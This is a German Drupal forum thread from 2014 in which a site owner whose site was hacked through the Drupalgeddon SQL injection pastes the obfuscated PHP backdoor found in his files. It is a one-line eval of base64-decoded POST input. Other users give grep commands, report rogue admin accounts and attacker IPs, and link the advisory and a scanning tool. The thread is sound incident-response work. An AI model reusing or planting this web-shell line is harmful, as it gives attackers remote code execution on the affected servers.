(GELÖST) Website wurde gehackt... Was tun?
Eingetragen von gauwuzl (113)am 24.10.2014 - 14:35 Uhr in
Hallo, eine meiner Website wurde gehackt (und leider, nein es gibt dafür kein Backup)... In den PHP-Dateien (bis jetzt hautsächlich in den Modulen) wurde unzählige Male dieser Code ganz am Anfang eingebaut:
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n57e83f'];if(isset($s22)){eval($s21($s22));}
?>Kennt sich jemand aus. Gibt es eine Möglichkeit alle Dateien nach dieser Zeile automatisch zu durchsuchen? Manuell ist das der Mörderaufwand...
Ich habe den Core aktualisiert und alle Module (vor einer Woche als zum ersten Mal vom Hoster eine Warnung kam) dachte ich hatte alles bereinigt und nun sind schon wieder Files mit den obigen Code infiziert.
Was bedeutet der Code. Wo soll ich sonst noch suchen? Vielen Dank für die Hilfe (wieder mal)
LG
Michael
- Anmelden oder Registrieren um Kommentare zu schreiben
Website wurde gehackt... Was tun?
am 24.10.2014 - 15:05 Uhr
http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/
https://www.google.com/search?client=ubuntu&channel=fs&q=%24sF%3D%22PCT4BA6ODSE_%22%3B%24s21%3Dstrtolower%28%24sF[4].%24sF[5].%24sF[9].%24sF[10].%24sF[6].%24sF[3].%24sF[11].%24sF[8].%24sF[10].%24sF[1].%24sF[7].%24sF[8].%24sF[10]%29%3B%24s22%3D%24{strtoupper%28%24&ie=utf-8&oe=utf-8
http://drupal.stackexchange.com/questions/134738/my-drupal-was-hacked-re...
https://wordpress.org/support/topic/possible-hack-of-my-site
xargs ...
am 24.10.2014 - 15:07 Uhr
Ich nehme an, dass du Commandline Zugriff hast:
find /your/drupal/dir -name '*.php' | xargs -n 10 grep 'PCT4BA6ODSE'Gruss & happy AntiHack
-- Beat
ebenfalls gehackt ... !
am 24.10.2014 - 15:27 Uhr
Zur Info: ich wurde auch gehackt! Per Zufall habe ich bemerkt, dass die USER tabelle einer meiner Webseiten modifiziert wurde. Vermultich betrifft dies: "SA-CORE-2014-005 - Drupal core - SQL injection"
In dieser USER Tabelle habe ich neue Einträge gefunden: 'admin2' sowie 'admin122'. Zusätzlich wurde mein Administrator Account umbenannt! Diese sind meines Wissens nicht mit phpmyadmin eingefügt worden, da ich im Logfile keine entsprechenden Einträge gefunden habe und es sich um ein mehrstufiges Sicherheitsprinzip handelt.
Im Drupal Report von heute morgen: "Warning: file_put_contents(iapstst.php) [function.file-put-contents]: failed to open stream: Permission denied in eval() (Zeile 1 von /var/www/drupal/modules/php/php.module(80) : eval()'d code).
Gruss
-- Beat
wow... vielen dank für die
am 24.10.2014 - 16:08 Uhr
wow... vielen dank für die rasche antwort... Beat: heißt das, dass bei dir in der Datenbank in der Tabelle "users" Admin-Accounts eingerichtet waren?
ja, richtig
am 24.10.2014 - 16:34 Uhr
Per Zufall wollte ich heute eine Frontseite eines Sportclubs aktualisieren und bemerkte, dass ich mich mit Drupal Administrator nicht mehr einloggen konnte - das machte mich stutzig, obschon ich mit fortgeschrittenem Alter etwas vergesslich werde ...
Mit dem MySQL Administrator konnte ich mich auf die DB connecten und habe mir die USER Tabelle angeschaut. Der Administrator war umbenannt und wie bereits geschrieben zwei neue User mit Administrator Rechten wurden zusätzlich eingefügt ('admin122' UID=99969 und 'admin2' UID=333333). Bei diesen neuen Usern war die Email nicht gesetzt und created Timestamp = 0 ...
Anhand Drupal Report und Apache Logfile habe ich kontrolliert, welche IP Adressen dafür verantwortlich waren: 118.113.157.88 und 118.113.158.xy. Anschliessend 118.113.157.* und 118.113.158.* sofort via TCP-Wrapper komplett ausgesperrt und anschliessend Drupal Update ausgeführt.
Gruss
-- Beat
Danke für die Info... Also
am 24.10.2014 - 16:57 Uhr
Danke für die Info...
Also ich habe jetzt mal alle infizierten Files mit den oben erwähnten Codes entfernt! In der DAtenbank habe ich in der User-Tabelle nichts gefunden...
Genügt das? Oder was sollte ich noch beachten bzw. wie sollte ich weiter vorgehen (Core und Plugins wurden wie gesagt aktualisiert... Passwörter wurden alle neu gesetzt)
Danke nochmals für eure Hilfe
Michael
Link zur Sicherheitsmeldung
am 25.10.2014 - 00:16 Uhr
Gefährliche Sicherheitslücke in Drupal 7: Dringend Patch einspielen oder auf Version 7.32 wechseln
Gelöst: Habe alles
am 29.10.2014 - 13:19 Uhr
Gelöst: Habe alles schadhaften Dateien bzw. Code entfernt und alle nötigen Sicherheitsupdates gemacht... Scheint gelöst zu sein und macht keine Probleme mehr....
Danke für eure Hilfe
Wenn es so einfach wäre
am 30.10.2014 - 09:53 Uhr
http://t3n.de/news/drupal-kritische-luecke-575379/
https://www.drupal.org/PSA-2014-003
Jep das is noch nicht vorbei,
am 30.10.2014 - 11:07 Uhr
Jep das is noch nicht vorbei, habe auch Links dazu gepostet aber wurde wieder gelöscht, scheint hier nicht als wichtig betrachtet zu werden.
http://www.heise.de/security/meldung/Drupal-Luecke-mit-dramatischen-Folg...
http://www.zdnet.com/drupal-warns-unless-you-patched-within-seven-hours-...
Hallo! Ich hätte gerne ein
am 30.10.2014 - 13:44 Uhr
Hallo!
Ich hätte gerne ein paar Infos und hoffe Ihr wisst mehr…
Woran kann ich sicher verifizieren das eine Seite kompromittiert ist?
In welcher Version war die Sicherheitslücke?
Alle D7 Versionen bis 7.31
am 30.10.2014 - 13:48 Uhr
Alle D7 Versionen bis 7.31
Danke, und woran kann ich
am 30.10.2014 - 14:00 Uhr
Danke, und woran kann ich sicher verifizieren das eine Seite schon betroffen ist?
Ihre Seite ist betroffen!
am 12.11.2014 - 19:42 Uhr
Prinzipiell ist mittlerweile davon auszugehen, dass alle Drupal-Seiten mit Version 7.x < 7.32 betroffen sind, die nicht unmittelbar nach dem Bekanntwerden der Sicherheitslücke entsprechend aktualisiert wurden (es sei denn Ihre Seite ist nicht erreichbar, nicht auffindbar bzw. nicht Drupal 7).
Da Angriffe unter Umständen keine oder nur wenige Spuren hinterlassen können, gibt es keine Tools oder Experten, die Ihnen mit Sicherheit garantieren können nicht betroffen zu sein. Es gibt jedoch ein Tool, dass Ihnen ggf. Versichern kann, dass Sie betroffen sind, indem es Spuren von bekannten Angriffen sucht. Das Tool, welches einen Drush-Befehl zum Untersuchen Ihrer Seite bereitstellt, können Sie unter folgender Adresse finden: https://www.drupal.org/project/drupalgeddon. Dort gibt es auch weitere Informationen und Links zum Thema.
Drupal 6 ist auch betroffen, wenn DBTNG-Modul im Einsatz
am 12.11.2014 - 19:51 Uhr
Prinzipiell ist mittlerweile davon auszugehen, dass alle Drupal-Seiten mit Version 7.x < 7.32 betroffen sind, die nicht unmittelbar nach dem Bekanntwerden der Sicherheitslücke entsprechend aktualisiert wurden (es sei denn Ihre Seite ist nicht erreichbar, nicht auffindbar bzw. nicht Drupal 7).
Vorsicht mit der Aussage "nicht Drupal 7": Drupal 6 ist auch betroffen, wenn DBTNG-Modul im Einsatz.
Auch hier im Drupalcenter gibt es Informationen zum Thema: